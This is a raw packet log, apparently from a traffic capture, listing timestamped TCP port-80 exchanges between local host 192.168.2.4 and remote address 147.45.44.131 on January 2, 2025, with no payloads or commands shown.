Jan 2, 2025 19:13:05.221874952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.221900940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222706079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222714901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222729921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222743988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222750902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222754955 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222764015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222774982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222781897 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222789049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222800016 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222800970 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222805023 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222805977 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222835064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222865105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222875118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222883940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222892046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222901106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222908020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222914934 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222925901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222935915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222944975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222949028 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222961903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222965002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.222979069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222985983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.222996950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.223001003 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.223006010 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.223016024 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.223017931 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.223026037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.223041058 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.223057985 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307189941 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307213068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307223082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307233095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307241917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307266951 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307270050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307286978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307297945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307305098 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307310104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307327032 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307337046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307343960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307348013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307358980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307369947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307375908 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307384014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307385921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307403088 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307416916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307426929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307435989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307449102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307450056 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307466984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307466984 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307475090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307485104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307496071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307504892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307507038 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307514906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307534933 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307535887 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307544947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307558060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307560921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307574034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307574987 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307584047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307595968 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307595968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307605982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307621956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307622910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307632923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307642937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307648897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307658911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307670116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307672024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307683945 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307687998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307698011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307707071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307723045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307727098 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307734013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307744980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307754040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307755947 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307765007 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307765961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307776928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307787895 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307794094 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307797909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307810068 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307820082 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307826996 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307838917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307856083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307868958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307871103 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307878971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307888985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307904005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307907104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307914972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307928085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307929039 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307938099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307945967 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307955980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307966948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307974100 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.307976961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307986975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.307996035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308007002 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308008909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308012962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308032990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308047056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308058023 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308058023 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308068991 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308079958 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308104992 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308109999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308119059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308129072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308141947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308146000 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308186054 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308202982 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308212996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308222055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308233976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308243036 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308244944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308254957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308267117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308267117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308281898 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308331966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308347940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308360100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308366060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308370113 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308381081 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308389902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308398008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308410883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308413982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308420897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308429956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308445930 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308445930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308460951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308466911 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308471918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308480978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308494091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308494091 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308512926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308520079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308530092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308538914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308549881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308552027 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308562040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308568954 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308588982 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308590889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308602095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308617115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308625937 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308636904 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.308648109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.308676004 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309561014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309571981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309581041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309591055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309602022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309609890 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309612036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309623957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309634924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309637070 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309647083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309710979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309720993 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309736967 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309746027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309746027 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309756994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309772968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309793949 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309818029 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309828043 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309838057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309849024 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309856892 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309871912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309880018 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309884071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309894085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309904099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309915066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309921026 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309925079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.309947968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.309966087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.310405970 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.393938065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394026995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394035101 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394045115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394053936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394063950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394073009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394076109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394084930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394095898 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394097090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394117117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394131899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394139051 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394143105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394150972 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394154072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394164085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394171953 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394176960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394195080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394196987 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394203901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394216061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394231081 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394232988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394241095 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394243002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394252062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394262075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394268990 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394279003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394294024 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394295931 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394309044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394324064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394325972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394334078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394344091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394354105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394354105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394364119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394372940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394373894 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394390106 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394396067 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394404888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394414902 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394419909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394427061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394434929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394443989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394454956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394459963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394469976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394475937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394479990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394483089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394491911 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394505978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394511938 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394521952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394530058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394540071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394547939 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394550085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394561052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394567966 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394571066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394581079 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394582033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394603968 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394612074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394619942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394630909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394639015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394642115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394650936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394661903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394665003 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394671917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394673109 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394689083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394695997 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394699097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394707918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394721031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394731998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394736052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394745111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394756079 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394762993 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394764900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394774914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394789934 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394804955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394843102 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394850016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394859076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394870996 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394872904 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394880056 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394890070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394896030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394898891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394912958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394922018 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394922972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394929886 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.394933939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394948959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.394954920 CET	49731	80	192.168.2.4	147.45.44.131
